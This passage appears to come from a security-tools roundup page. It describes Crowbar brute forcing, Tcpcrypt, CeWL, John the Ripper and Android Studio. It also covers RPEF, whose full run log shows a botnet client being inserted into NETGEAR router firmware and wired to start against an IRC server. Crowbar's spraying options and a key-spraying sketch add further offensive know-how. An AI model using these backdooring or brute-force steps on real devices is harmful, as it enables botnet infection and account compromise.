  • SSH private key authentication
  • VNC key authentication
  • Remote Desktop Protocol (RDP) with NLA support
Installation

First, install the dependencies:
 # apt-get install openvpn freerdp-x11 vncviewer
Then get the latest version from GitHub:
 # git clone https://github.com/galkan/crowbar 
Attention: the RDP client package depends on your Kali version. It may be xfreerdp on the latest release.

Usage

-h: Shows the help menu.
-b: Target service. Crowbar currently supports vnckey, openvpn, sshkey, and rdp.
-s: Target IP address.
-S: File that stores target IP addresses.
-u: Username.
-U: File that stores a username list.
-n: Thread count.
-l: Log file name. The default is crowbar.log, located in your current directory.
-o: Output file name, which stores successful attempts.
-c: Password.
-C: File that stores a password list.
-t: Timeout value.
-p: Port number.
-k: Full path to the key file.
-m: OpenVPN configuration file path.
-d: Run nmap to discover whether the target port is open, so that you only brute force reachable targets.
-v: Verbose mode, which shows all attempts, including failures.
To see all usage options, run crowbar --help
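The key-based approach described above — trying harvested SSH keys against many hosts rather than guessing passwords — can be sketched in a few lines of Python. The `try_key` callback here is a hypothetical stand-in for a real SSH client call; it is the idea behind Crowbar's sshkey mode, not Crowbar's actual implementation.

```python
# Sketch of SSH key spraying: every (host, user, key) combination is
# tried and successes are collected. try_key is a hypothetical stub;
# a real tool would attempt an actual SSH session with the key.

def spray(hosts, users, keys, try_key):
    successes = []
    for host in hosts:
        for user in users:
            for key in keys:
                if try_key(host, user, key):
                    successes.append((host, user, key))
    return successes

# Example run against a fake oracle standing in for real SSH servers.
valid = {("10.0.0.5", "root", "id_rsa_admin")}
fake_try = lambda h, u, k: (h, u, k) in valid
found = spray(["10.0.0.5", "10.0.0.6"], ["root"],
              ["id_rsa_admin", "id_rsa_dev"], fake_try)
```

Crowbar additionally threads these attempts (the -n option) and can pre-filter hosts with nmap (-d) before trying keys.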



Tcpcrypt - Encrypting the Internet


Tcpcrypt is a protocol that attempts to encrypt (almost) all of your network traffic. Unlike other security mechanisms, Tcpcrypt works out of the box: it requires no configuration, no changes to applications, and your network connections will continue to work even if the remote end does not support Tcpcrypt, in which case connections will gracefully fall back to standard clear-text TCP. Install Tcpcrypt and you'll feel no difference in your everyday user experience, yet your traffic will be more secure and you'll have made life much harder for hackers.

So why is now the right time to turn on encryption? Here are some reasons:
  • Intercepting communications today is simpler than ever because of wireless networks. Ask a hacker how many e-mail passwords can be intercepted at an airport by just using a wifi-enabled laptop. This unsophisticated attack is in reach of many. The times when only a few elite had the necessary skill to eavesdrop are gone.
  • Computers have now become fast enough to encrypt all Internet traffic. New computers come with special hardware crypto instructions that allow encrypted networking speeds of 10Gbit/s. How many of us even achieve those speeds on the Internet or would want to download (and watch) one movie per second? Clearly, we can encrypt fast enough.
  • Research advances and the lessons learnt from over 10 years of experience with the web finally enabled us to design a protocol that can be used in today's Internet, by today's users. Our protocol is pragmatic: it requires no changes to applications, it works with NATs (i.e., compatible with your DSL router), and will work even if the other end has not yet upgraded to tcpcrypt—in which case it will gracefully fall back to using the old plain-text TCP. No user configuration is required, making it accessible to lay users—no more obscure requests like "Please generate a 2048-bit RSA-3 key and a certificate request for signing by a CA". Tcpcrypt can be incrementally deployed today, and with time the whole Internet will become encrypted.

How Tcpcrypt works

Tcpcrypt is opportunistic encryption. If the other end speaks Tcpcrypt, then your traffic will be encrypted; otherwise it will be in clear text. Thus, Tcpcrypt alone provides no guarantees—it is best effort. If, however, a Tcpcrypt connection is successful and any attackers that exist are passive, then Tcpcrypt guarantees privacy.

Network attackers come in two varieties: passive and active (man-in-the-middle). Passive attacks are much simpler to execute because they just require listening on the network. Active attacks are much harder as they require listening and modifying network traffic, often requiring very precise timing that can make some attacks impractical.

By default Tcpcrypt is vulnerable to active attacks—an attacker can, for example, modify a server's response to say that Tcpcrypt is not supported (when in fact it is) so that all subsequent traffic will be clear text and can thus be eavesdropped on.

Tcpcrypt, however, is powerful enough to stop active attacks, too, if the application using it performs authentication. For example, if you log in to online banking using a password and the connection is over Tcpcrypt, it is possible to use that shared secret between you and the bank (i.e., the password) to authenticate that you are actually speaking to the bank and not some active (man-in-the-middle) attacker. The attacker cannot spoof authentication as it lacks the password. Thus, by default, Tcpcrypt will try its best to protect your traffic. Applications requiring stricter guarantees can get them by authenticating a Tcpcrypt session.
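The probe-and-fall-back behaviour described above can be sketched as follows. The `negotiate` function is a hypothetical stub; in the real protocol the probe is carried inside the TCP handshake options rather than as a separate application-level step.

```python
# Opportunistic encryption sketch: attempt an encrypted session; if the
# peer does not support it, gracefully fall back to plain text instead
# of failing the connection. negotiate() is a hypothetical stand-in for
# tcpcrypt's in-handshake negotiation.

def connect(peer_supports_tcpcrypt):
    def negotiate():
        # Stand-in for the probe carried in the TCP handshake options.
        if not peer_supports_tcpcrypt:
            raise ConnectionError("peer did not echo the crypt option")
        return "encrypted"

    try:
        return negotiate()
    except ConnectionError:
        return "cleartext"  # graceful fallback: the connection still works
```

This is why Tcpcrypt alone is best effort: an active attacker who strips the probe simply forces the cleartext branch, which is what application-level authentication is needed to detect.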

How Tcpcrypt is different

Some of us already encrypt some network traffic using SSL (e.g., HTTPS) or VPNs. Those solutions are inadequate for ubiquitous encryption. For example, almost all solutions rely on a PKI to stop man-in-the-middle attacks, which for ubiquitous deployment would mean that all Internet users would have to get verified by a CA like Verisign and have to spend money to buy a certificate. Tcpcrypt abstracts away authentication, allowing any mechanism to be used, whether PKI, passwords, or something else.
Next, Tcpcrypt can be incrementally deployed: it has a mechanism for probing support and can gracefully fall back to TCP. It also requires no configuration (try that with a VPN!) and has no NAT issues. Finally, Tcpcrypt has very high performance (up to 25x faster than SSL), making it feasible for high volume servers to enable encryption on all connections. While weaker by default, Tcpcrypt is more realistic for universal deployment.

We can easily make the bar much higher for attackers, so let's do it. How much longer are we going to stay clear-text by default?


RPEF - Abstracts and expedites the process of backdooring stock firmware images for consumer/SOHO routers


Router Post-Exploitation Framework

Currently, the framework includes a number of firmware image modules, each marked with a status:
  • 'Verified' - This module is confirmed to work and is stable.
  • 'Unverified' - This module is believed to work, or should work with little additional effort, but awaits testing on a physical device.
  • 'Testing' - This module is currently undergoing development and is unstable for the time being. Users should consider it a "work in progress."
  • 'Roadblock' - Issues have halted progress on this module for the time being. Certain unavailable utilities or significant reverse engineering work may be necessary.
For a list of options, run:
./rpef.py -h
For a list of all currently supported firmware targets, run:
./rpef.py -ll

The script is written for Python 2.6 and may require the installation of a few modules. It is typically invoked as:
./rpef.py <firmware image> <output file> <payload>
and accepts a number of optional switches (see -h).
The rules/ directory stores a hierarchy of rules// directories. One module correlates to one firmware checksum (not to one specific router) since multiple routers have been observed to run the exact same firmware. Within each module is properties.json which stores the language and order of operations necessary to unpackage, backdoor, and repackage the target firmware image. The payloads/ directory stores cross-compiled binaries ready for deployment, and the optional dependencies/ directory stores miscellaneous files to aid the process.
The utilities/ directory stores pre-compiled x86 binaries to perform tasks such as packing/unpacking filesystems, compressing/decompressing data (for which no suitable .py module exists), and calculating checksums.
The payloads_src/ directory stores source code for the payloads themselves. All payloads are written from scratch to keep them as small as possible.

Usage

To verbosely generate a firmware image for the WGR614v9 backdoored with a botnet client, run:
./rpef.py WGR614v9-V1.2.30_41.0.44NA.chk WGR614v9-V1.2.30_41.0.44NA_botnet.chk botnet -v
And the process should proceed as follows:
$ ./rpef.py WGR614v9-V1.2.30_41.0.44NA.chk WGR614v9-V1.2.30_41.0.44NA_botnet.chk botnet -v
[+] Verifying checksum
Calculated checksum: 767c962037b32a5e800c3ff94a45e85e
Matched target: NETGEAR WGR614v9 1.2.30NA (Verified)
[+] Extracting parts from firmware image
Step 1: Extract WGR614v9-V1.2.30_41.0.44NA.chk, Offset 58, Size 456708 -> /tmp/tmpOaw1tn/headerkernel.bin
Step 2: Extract WGR614v9-V1.2.30_41.0.44NA.chk, Offset 456766, Size 1476831 -> /tmp/tmpOaw1tn/filesystem.bin
[+] Unpacking filesystem
Step 1: unsquashfs-1.0 /tmp/tmpOaw1tn/filesystem.bin -> /tmp/tmpOaw1tn/extracted_fs
Executing: utilities/unsquashfs-1.0 -dest /tmp/tmpOaw1tn/extracted_fs /tmp/tmpOaw1tn/filesystem.bin

created 217 files
created 27 directories
created 48 symlinks
created 0 devices
created 0 fifos
[+] Inserting payload
Step 1: Rm /tmp/tmpOaw1tn/extracted_fs/lib/modules/2.4.20/kernel/net/ipv4/opendns/openDNS_hijack.o
Step 2: Copy rules/NETGEAR/WGR614v9_1.2.30NA/payloads/botnet /tmp/tmpOaw1tn/extracted_fs/usr/sbin/botnet
Step 3: Move /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd.bak
Step 4: Touch /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 5: Appendtext "#!/bin/msh
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
[+] INPUT REQUIRED, IP address of IRC server: 1.2.3.4
[+] INPUT REQUIRED, Port of IRC server: 6667
[+] INPUT REQUIRED, Channel to join (include #): #hax
[+] INPUT REQUIRED, Prefix of bot nick: toteawesome
Step 6: Appendtext "/usr/sbin/botnet 1.2.3.4 6667 \#hax toteawesome &
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 7: Appendtext "/usr/sbin/httpd.bak
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
Step 8: Chmod 777 /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
[+] Building filesystem
Step 1: mksquashfs-2.1 /tmp/tmpOaw1tn/extracted_fs, Blocksize 65536, Little endian -> /tmp/tmpOaw1tn/newfs.bin
Executing: utilities/mksquashfs-2.1 /tmp/tmpOaw1tn/extracted_fs /tmp/tmpOaw1tn/newfs.bin -b 65536 -root-owned -le
Creating little endian 2.1 filesystem on /tmp/tmpOaw1tn/newfs.bin, block size 65536.

Little endian filesystem, data block size 65536, compressed data, compressed metadata, compressed fragments
Filesystem size 1442.99 Kbytes (1.41 Mbytes)
29.38% of uncompressed filesystem size (4912.18 Kbytes)
Inode table size 2245 bytes (2.19 Kbytes)
33.63% of uncompressed inode table size (6675 bytes)
Directory table size 2322 bytes (2.27 Kbytes)
55.26% of uncompressed directory table size (4202 bytes)
Number of duplicate files found 3
Number of inodes 293
Number of files 218
Number of fragments 22
Number of symbolic links 48
Number of device nodes 0
Number of fifo nodes 0
Number of socket nodes 0
Number of directories 27
Number of uids 1
root (0)
Number of gids 0
[+] Gluing parts together
Step 1: Touch WGR614v9-V1.2.30_41.0.44NA_botnet.chk
Step 2: Appendfile /tmp/tmpOaw1tn/headerkernel.bin >> WGR614v9-V1.2.30_41.0.44NA_botnet.chk
Step 3: Appendfile /tmp/tmpOaw1tn/newfs.bin >> WGR614v9-V1.2.30_41.0.44NA_botnet.chk
[+] Padding image with null bytes
Step 1: Pad WGR614v9-V1.2.30_41.0.44NA_botnet.chk to size 1937408 with 0 (0x00)
[+] Generating CHK header
Step 1: packet WGR614v9-V1.2.30_41.0.44NA_botnet.chk rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/compatible_NA.txt rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/ambitCfg.h
Executing: utilities/packet -k WGR614v9-V1.2.30_41.0.44NA_botnet.chk -b rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/compatible_NA.txt -i rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/ambitCfg.h
[+] Removing temporary files
Step 1: Rmdir /tmp/tmpOaw1tn/
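Two of the steps shown in the transcript — matching the firmware image to a module by its checksum, and padding the rebuilt image with null bytes to a fixed size — can be sketched in Python. The helper names and the lookup table entry are illustrative only, not RPEF's actual API.

```python
import hashlib

# Sketch of two RPEF steps: identify a firmware image by its MD5
# checksum (one module per checksum, as described above), and pad the
# rebuilt image with 0x00 bytes up to the size the device expects.
# Helper names are hypothetical, not RPEF's real functions.

KNOWN_IMAGES = {
    # checksum -> module name (entry taken from the transcript above)
    "767c962037b32a5e800c3ff94a45e85e": "NETGEAR WGR614v9 1.2.30NA",
}

def identify(image_bytes):
    return KNOWN_IMAGES.get(hashlib.md5(image_bytes).hexdigest())

def pad_to(image_bytes, size, fill=b"\x00"):
    if len(image_bytes) > size:
        raise ValueError("image larger than target size")
    return image_bytes + fill * (size - len(image_bytes))
```

Keying modules on the checksum rather than the router model is what lets one module serve several routers that ship the exact same firmware.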


CeWL - Custom WordList Generator Tool for Password Cracking

CeWL is a Ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used with password crackers such as John the Ripper.

CeWL also has an associated command line app, FAB (Files Already Bagged), which uses the same metadata extraction techniques to create author/creator lists from files that have already been downloaded.
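The core of what CeWL does after fetching a page — strip markup, keep words at or above the minimum length, count occurrences — can be sketched in a few lines of Python. This is an illustration of the idea only, not CeWL's Ruby implementation; spidering and metadata extraction are omitted.

```python
import re
from collections import Counter

# Sketch of CeWL-style word extraction: drop HTML tags, pull out words
# of at least min_word_length characters, and count occurrences (as the
# -m and -c options do).

def extract_words(html, min_word_length=3):
    text = re.sub(r"<[^>]+>", " ", html)    # strip tags
    words = re.findall(r"[A-Za-z]+", text)  # letters only
    kept = [w for w in words if len(w) >= min_word_length]
    return Counter(kept)

page = "<p>Password reset: enter your old password to set a new password.</p>"
counts = extract_words(page)
```

Sorting the resulting counts descending gives the candidate list a password cracker tries first, which is why the -c count option is useful.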

Usage
cewl [OPTION] ... URL
--help, -h
Show help
--depth x, -d x
The depth to spider to, default 2
--min_word_length, -m
The minimum word length, this strips out all words under the specified length, default 3
--offsite, -o
By default, the spider will only visit the site specified. With this option it will also visit external sites
--write, -w file
Write the output to the file rather than to stdout
--ua, -u user-agent
Change the user agent
--verbose, -v
Verbose, show debug and extra output
--no-words, -n
Don't output the wordlist
--meta, -a file
Include meta data, optional output file
--email, -e file
Include email addresses, optional output file
--meta_file file
Filename for metadata output
--email_file file
Filename for email output
--meta-temp-dir directory
The directory used by exiftool when parsing files, the default is /tmp
--count, -c
Show the count for each of the words found
--auth_type
Digest or basic
--auth_user
Authentication username
--auth_pass
Authentication password
--proxy_host
Proxy host
--proxy_port
Proxy port, default 8080
--proxy_username
Username for proxy, if required
--proxy_password
Password for proxy, if required
URL
The site to spider.


Change Log
Keeping track of history.
  • Version 4.3 - Various spider bug fixes and the introduction of sorting the results by count
  • Version 4.2 - Fixed the Spider gem by overriding the function, also handling #name links correctly
  • Version 4.1 - Small bug fixes and added new parameter to set filenames for email and metadata output
  • Version 4 - Runs with Ruby 1.9.x and grabs text out of alt and title tags
  • Version 3 - Now spiders pages referenced in JavaScript location commands
  • Version 2.2 - Data from email addresses and meta data can be written to their own files
  • Version 2.1 - Fixed a bug some people were having while using the email option
  • Version 2 - Added meta data support
  • Version 1 - released

John the Ripper 1.8.0-jumbo-1 - Fast Password Cracker


John the Ripper is a free password cracking software tool. Initially developed for the Unix operating system, it now runs on fifteen different platforms (eleven of which are architecture-specific versions of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix versions (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL, and others.

John the Ripper 1.8.0-jumbo-1 is based on today’s code from the bleeding-jumbo branch on GitHub, which we’ve tried to make somewhat stable lately in preparation for this release.

You may notice that the source code archive size has increased from under 2 MB to over 20 MB. This is primarily due to the included .chr files, which are both bigger and more numerous than pre-1.8 ones. There are lots of source code additions, too.

In fact:

This is probably the biggest single jumbo update so far. The changes are too numerous to summarize – unfortunately, we haven’t been doing that during development, and it’d be a substantial effort to do it now, delaying the release to next year. So we chose to go ahead and release whatever we’ve got. (Of course, there are the many commit messages – but that’s not a summary.)

A really brief summary, though, is that there are new “formats” (meaning more supported hash and “non-hash” types, both on CPU and on GPU), various enhancements to existing ones, mask mode, better support for non-ASCII character sets, and of course all of 1.8.0’s features (including --fork and --node). And new bugs. Oh, and we’re now using autoconf, meaning that you need to “./configure” and “make”, with all the usual pros and cons of this approach. There’s a Makefile.legacy included, so you may “make -f Makefile.legacy” to try and build JtR the old way if you refuse to use autoconf… for now…and this _might_ even work… but you’d better bite the bullet. (BTW, I have no current plans on autoconf’ing non-jumbo versions of JtR.)

Due to autoconf, things such as OpenMP and OpenCL are now enabled automatically (if system support for them is detected during build). When this is undesirable, you may use e.g. “./configure --disable-openmp” or “./configure --disable-openmp-for-fast-formats” and run with --fork to achieve a higher cumulative c/s rate across the fork’ed processes.

Out of over 4800 commits since 1.7.9-jumbo-7, over 2600 are by magnum, making him the top contributor. Other prolific contributors are JimF, Dhiru Kholia, Claudio Andre, Frank Dittrich, Sayantan Datta.

There are also multiple commits by (or attributed to) Lukas Odzioba, ShaneQful, Alexander Cherepanov, rofl0r, bwall, Narendra Kangralkar, Tavis Ormandy, Spiros Fraganastasis, Harrison Neal, Vlatko Kosturjak, Aleksey Cherepanov, Jeremi Gosney, junmuz, Thiebaud Weksteen, Sanju Kholia, Michael Samuel, Deepika Dutta, Costin Enache, Nicolas Collignon, Michael Ledford. There are single commits by (or attributed to) many other contributors as well (including even one by atom of hashcat).


Android Studio - The official Android IDE


Android Studio is the official IDE for Android application development, based on IntelliJ IDEA. On top of the capabilities you expect from IntelliJ, Android Studio offers:
  • Flexible Gradle-based build system
  • Build variants and multiple APK file generation
  • Code templates to help you build common app features
  • Rich layout editor with support for drag and drop theme editing
  • Lint tools to catch performance, usability, version compatibility, and other problems
  • ProGuard and app-signing capabilities
  • Built-in support for Google Cloud Platform, making it easy to integrate Google Cloud Messaging and App Engine
  • And much more

Intelligent code editor
At the core of Android Studio is an intelligent code editor capable of advanced code completion, refactoring, and code analysis.
The powerful code editor helps you be a more productive Android app developer.

Code templates and GitHub integration
New project wizards make it easier than ever to start a new project.
Start projects using template code for patterns such as navigation drawer and view pagers, and even import Google code samples from GitHub.

Multi-screen app development
Build apps for Android phones, tablets, Android Wear, Android TV, Android Auto and Google Glass.
With the new Android Project View and module support in Android Studio, it's easier to manage app projects and resources.

Virtual devices for all shapes and sizes
Android Studio comes pre-configured with an optimized emulator image.
The updated and streamlined Virtual Device Manager provides pre-defined device profiles for common Android devices.

Android builds evolved, with Gradle
Create multiple APKs for your Android app with different features using the same project.
Manage app dependencies with Maven.
Build APKs from Android Studio or the command line.